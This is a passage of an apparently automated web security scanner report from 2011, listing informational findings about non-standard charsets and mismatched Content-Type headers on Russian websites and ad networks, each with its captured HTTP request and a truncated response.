<head>
   <title>MyWebalta</title>

   <meta http-equiv="Content-Type" content="text/html; charset="utf-8">
   <meta name="keywords" content="xlst">
...[SNIP]...

32.5. http://vkontakte.ru/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://vkontakte.ru
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:23:04 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: remixchk=5; expires=Tue, 17-Apr-2012 02:49:46 GMT; path=/; domain=.vkontakte.ru
Pragma: no-cache
Cache-control: no-store
Vary: Accept-Encoding
Content-Length: 12904

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<script type="
...[SNIP]...
<link rel="shortcut icon" href="/images/faviconnew.ico" />

<meta http-equiv="content-type" content="text/html; charset=windows-1251" />
<meta name="description" content="<b>
...[SNIP]...

32.6. http://vkontakte.ru/login.php  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://vkontakte.ru
Path:   /login.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /login.php?act=slogin&al_frame=1&auto=1 HTTP/1.1
Host: vkontakte.ru
Proxy-Connection: keep-alive
Referer: http://vkontakte.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: remixchk=5

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Mon, 25 Apr 2011 14:24:44 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-control: no-store
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: remixmid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixsid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixgid=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixemail=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Set-Cookie: remixpass=deleted; expires=Sun, 25-Apr-2010 14:24:43 GMT; path=/; domain=.vkontakte.ru
Vary: Accept-Encoding
Content-Length: 540

<script type="text/javascript">
var _ua = navigator.userAgent;
var locDomain = 'vkontakte.ru'.match(/[a-zA-Z]+\.[a-zA-Z]+\.?$/)[0];
if (/opera/i.test(_ua) || !/msie 6/i.test(_ua) || document.domain !=
...[SNIP]...

32.7. http://www.gartner.com/include/webtrends.jsp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.gartner.com
Path:   /include/webtrends.jsp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /include/webtrends.jsp HTTP/1.1
Host: www.gartner.com
Proxy-Connection: keep-alive
Referer: http://www.gartner.com/DisplayDocument?doc_cd=127481
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WebLogicSession=cSYnN1vJnb1Nx84rkvK9h3y2Z1JSqHc4Q7GnchMG2ZDySdxm2Pns!475228577; WT_FPC=id=173.193.214.243-1722167968.30147392:lv=1303732853510:ss=1303732853510; TS83f541=32d23d3d5a761af07eb8e7078f5d2a8c0621405c7f8621844db564c8

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:10:48 GMT
Content-type: text/html; charset=ISO8859_1
Date: Mon, 25 Apr 2011 12:10:48 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
X-PvInfo: [S10203.C10821.A151026.RA0.G24F27.UD4EB7C80].[OT/html.OG/pages]
Vary: Accept-Encoding
Content-Length: 22376

<!-- START OF Advanced SmartSource Data Collector TAG -->
<!-- Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.-->
<!-- $DateTime: 2006/03/09 14:15:22 $ -->
<!-- 2006/10/30: Modified by
...[SNIP]...

33. Content type incorrectly stated  previous  next
There are 94 instances of this issue:


33.1. http://an.yandex.ru/code/47934  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/47934

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwww.trucklist.ru%2Fcars%2Ftrucks%3Futm_source%3Dy_direct%26utm_medium%3Dcpc%26utm_campaign%3Dtruck%26_openstat%3DZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:43:31 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:43:31 GMT
Expires: Mon, 25 Apr 2011 14:43:31 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=00000FxPbsm00000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:43:31 GMT
Content-Length: 6232

var y5_sLinkHead = 'http://an.yandex.ru/count/Jd4i95txsC440000ZhE9MDi4XPwp2vQlAn7HaRXs6q01arIam00000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...

33.2. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /code/57617?rnd=309442&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2F&grab=dNCf0L7QuNGB0LrQvtCy0LDRjyDRgdC40YHRgtC10LzQsCBXZWJhbHRh HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:05 GMT
Expires: Mon, 25 Apr 2011 14:20:05 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 7397

var y5_sLinkHead = 'http://an.yandex.ru/count/CvVSK7g7hke40000ZhKnMDi4XP4H3fQb-Qd2aRHle6OCarIaeW00G7m3';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {
if
...[SNIP]...

33.3. http://an.yandex.ru/code/66894  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://an.yandex.ru
Path:   /code/66894

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /code/66894?rnd=928638&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fpogoda.webalta.ru%2F&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:30 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:30 GMT
Expires: Mon, 25 Apr 2011 14:20:30 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:30 GMT
Content-Length: 3561

var y5_sLinkHead = 'http://an.yandex.ru/count/1QrEGmZSpqW40000ZhuoMDi4XPvK49Qke0McaRm8UAa3arIapW0000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...

33.4. http://ar.voicefive.com/b/rc.pli  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction&n=ar_int_p97174789&1303741250889 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:31:26 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

33.5. http://auto.webalta.ru/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://auto.webalta.ru
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218; MG_id=8504; MG_type=news; __utmz=148001959.1303741225.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pogoda_reg=10290; MG_1668=2; __utma=148001959.511646108.1303741225.1303741225.1303741225.1; __utmc=148001959; __utmb=148001959.2.10.1303741225

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:23:37 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 04 Feb 2011 08:10:09 GMT
ETag: "c8010a-37e-49b70691d1a40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

33.6. http://auto.webalta.ru/public/css/style-auto.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://auto.webalta.ru
Path:   /public/css/style-auto.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /public/css/style-auto.css HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Feb 2011 08:07:18 GMT
ETag: "8680c5-17af-49be911f81980"
Accept-Ranges: bytes
Content-Length: 6063
Connection: close
Content-Type: text/css

body {padding:0; margin:0 3px 10px; background-color:#FFF;}
body, a, div, td {font:normal 12px Tahoma; color:#666;}

a, a:hover {text-decoration:none;}
a:hover {text-decoration:underline;}

.lin
...[SNIP]...

33.7. http://auto.webalta.ru/public/js/webalta.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://auto.webalta.ru
Path:   /public/js/webalta.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /public/js/webalta.js HTTP/1.1
Host: auto.webalta.ru
Proxy-Connection: keep-alive
Referer: http://auto.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165308000.1303741218.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=165308000.73118877.1303741218.1303741218.1303741218.1; __utmc=165308000; __utmb=165308000.2.10.1303741218

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 14 Dec 2010 16:41:55 GMT
ETag: "d182a6-158f-497617f95fac0"
Accept-Ranges: bytes
Content-Length: 5519
Connection: close
Content-Type: application/x-javascript

// version 2

function $$(target)
{
   return document.getElementById(target);
}

function newsSetCategory(n)
{
   var i;
   var item;
   var button;
   
   n = n || 0;

   for(i = 0; i < 10; i++)
   
...[SNIP]...

33.8. http://b2bcontext.ru/services/advertisement/getblock  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://b2bcontext.ru
Path:   /services/advertisement/getblock

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /services/advertisement/getblock?17723897 HTTP/1.1
Host: b2bcontext.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:47:19 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 30189

var b2bctb_id_12402960=b2bctb_rand;var keyg_12402960=new Array();var keyb_12402960=new Array();var b2b_check_urls_dim=[{id:4,atr:"iuuq;00xnnbjm/sv"},{id:8,atr:"iuuq;00xxx/xnnbjm/sv"},{id:12,atr:"iuuq;
...[SNIP]...

33.9. http://css.loveplanet.ru/3/img/pda/main.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://css.loveplanet.ru
Path:   /3/img/pda/main.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /3/img/pda/main.js HTTP/1.1
Host: css.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:47 GMT
Content-Type: application/x-javascript; charset=UTF-8
Last-Modified: Fri, 22 Apr 2011 08:57:07 GMT
Connection: keep-alive
Expires: Mon, 25 Apr 2011 17:51:47 GMT
Cache-Control: max-age=10800
Content-Length: 5733

function onLoadPage(){return true;}

/* -------------------------------------------------------------
   Opening and closing blocs
------------------------------------------------------------- */
f
...[SNIP]...

33.10. http://direct.yandex.ru/pages/direct/_direct-1303387947.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://direct.yandex.ru
Path:   /pages/direct/_direct-1303387947.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /pages/direct/_direct-1303387947.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:36 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:27 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:36 GMT
Cache-Control: max-age=86400
Content-Length: 432639

var ADDRESS_STREET_PREFIXES="",ALLOW_LETTERS="abcdefghijklmonpqrstuvwxyzABCDEFGHIJKLMONPQRSTUVWXYZ......................................................................................................
...[SNIP]...

33.11. http://direct.yandex.ru/pages/index/_index-1303387946.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://direct.yandex.ru
Path:   /pages/index/_index-1303387946.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /pages/index/_index-1303387946.js HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
Referer: http://direct.yandex.ru/?partner
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:02 GMT
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 21 Apr 2011 12:12:26 GMT
Connection: keep-alive
Expires: Tue, 26 Apr 2011 14:36:02 GMT
Cache-Control: max-age=86400
Content-Length: 13173

var key="",time="",is_mediaplan;var submit_flag=false;var SCRIPT="/registered/main.pl";var MAX_URL_LENGTH=1024;Array.prototype.__fftrap=function(){};function AdvqLite(m,c,g,j,t){var q=800,l=600;var s=
...[SNIP]...

33.12. http://event.adxpose.com/event.flow  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-1134822682510879%26output%3Dhtml%26h%3D600%26slotname%3D3061072279%26w%3D160%26lmt%3D1303759227%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fgames.webalta.ru%252F%26dt%3D1303741227549%26bpp%3D5%26shv%3Dr20110420%26jsv%3Dr20110415%26correlator%3D1303741227571%26frm%3D0%26adk%3D1110337129%26ga_vid%3D973557293.1303741228%26ga_sid%3D1303741228%26ga_hid%3D154889240%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D1%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1125%26bih%3D929%26fu%3D0%26ifi%3D1%26dtd%3D35%26xpc%3DnaYdoqC7iz%26p%3Dhttp%253A%2F%2Fgames.webalta.ru&uid=ZC45X9Axu6NOUFfX_289668&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303741233200-54504055902361870&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9C355083964F0D94352A7538219BE1B4; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Mon, 25 Apr 2011 14:23:42 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_289668");

33.13. http://foreign.dt00.net/zones/form4.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/form4.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /zones/form4.js HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:34:30 GMT
Content-Type: application/x-javascript
Content-Length: 5615
Last-Modified: Wed, 08 Dec 2010 19:18:44 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes


var searchFields = Array();
var searchPhrases = Array();
var searchLinks = Array();
var searchActions = Array();
var beforeSearch = Array();
var afterSearch = Array();

...[SNIP]...

33.14. http://foreign.dt00.net/zones/zone1.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://foreign.dt00.net
Path:   /zones/zone1.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /zones/zone1.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/top.php?site=3&cat=30&red=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:02 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 313


